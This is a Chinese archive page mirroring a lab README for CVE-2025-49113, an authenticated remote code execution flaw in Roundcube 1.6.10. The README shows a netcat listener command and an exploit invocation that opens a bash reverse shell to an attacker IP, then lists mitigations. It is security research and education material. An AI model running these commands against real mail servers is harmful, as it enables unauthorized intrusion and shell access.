关联漏洞
标题:
Roundcube Webmail 安全漏洞
(CVE-2025-49113)
描述:Roundcube Webmail是Roundcube开源的一款基于浏览器的开源IMAP客户端,它支持地址薄管理、信息搜索、拼写检查等。 Roundcube Webmail 1.5.10之前版本和 1.6.11之前版本存在安全漏洞,该漏洞源于未验证_from参数,可能导致PHP对象反序列化攻击。
介绍
# CVE-2025-49113 – Roundcube 1.6.10 Authenticated Remote Code Execution
> ⚠️ **Disclaimer**
This repository is intended strictly for educational and research purposes.
All demonstrations were performed in a controlled lab environment.
Unauthorized testing or exploitation of systems without explicit permission is illegal and unethical. The author is not responsible for any misuse of this information.
---
## 📌 What Is Roundcube?
**Roundcube** is a widely used, browser-based IMAP email client written in PHP. It provides a user-friendly interface for webmail access and is commonly deployed by hosting providers, academic institutions, and internal enterprise mail servers.
---
## 🚨 About the Vulnerability
**CVE-2025-49113** is a vulnerability affecting **Roundcube version 1.6.10** that allows an **authenticated user** to achieve **remote code execution** (RCE) by submitting a crafted command through the webmail interface.
Successful exploitation requires valid user credentials. Once exploited, it grants system-level command execution based on the web server's context.
- **CVE ID**: CVE-2025-49113
- **Affected Application**: Roundcube 1.6.10
- **Vulnerability Type**: Authenticated Remote Code Execution
- **Exploit Type**: Reverse Shell via PHP Payload
- **Exploit Availability**: [Public GitHub PoC](https://github.com/hakaioffsec/CVE-2025-49113-exploit)
---
## ⚙️ Lab Setup
- **Target URL**: `http://mail.outbound.htb`
- **Roundcube Version**: 1.6.10
- **Listener**: Netcat on port `4444`
- **Exploit**: `CVE-2025-49113.php`
---
## 🚀 Exploit Usage
### 1. Start Netcat Listener
```bash
nc -nlvp 4444
```
### 2. Run the Exploit
```bash
php CVE-2025-49113.php {url} {username} {password} "bash -c 'bash -i >& /dev/tcp/<YOUR-IP>/4444 0>&1'"
```
> 🔧 Replace `<YOUR-IP>` with your attacker's IP.
---
## 📸 Demonstration
### Exploit Script Output
### Reverse Shell Captured
---
## 🔐 Mitigation
- Upgrade Roundcube to the latest stable and secure release.
- Remove or restrict user access to vulnerable components.
- Enforce strong access controls and IP whitelisting for webmail interfaces.
- Monitor authentication logs for anomalies.
- Apply least privilege principles on web server environments.
---
## 📝 Notes
- Exploit requires authentication.
- Only tested against Roundcube 1.6.10.
- The user context of the shell depends on the server configuration.
- Demonstration conducted in a virtual lab environment.
---
## 📚 References
- [OffSec Blog Post](https://www.offsec.com/blog/cve-2025-49113/)
- [Public Exploit](https://github.com/hakaioffsec/CVE-2025-49113-exploit)
---
## 📝 Medium Blog
Check out the detailed walkthrough and theory on my Medium post:
👉 **[Read the blog on Medium](https://medium.com/@cyberquestor/cve-2025-49113-roundcube-1-6-10-remote-code-execution-0598e7944361?sk=b0023c78b7f0d8de5e683f4d2316967d)**
文件快照
[4.0K] /data/pocs/d966c85bed97dc63aae26e3c7f5165046150108e
├── [4.0K] img
│ ├── [ 44K] reverse_shell.png
│ └── [ 65K] roundcube.png
└── [3.0K] README.md
1 directory, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。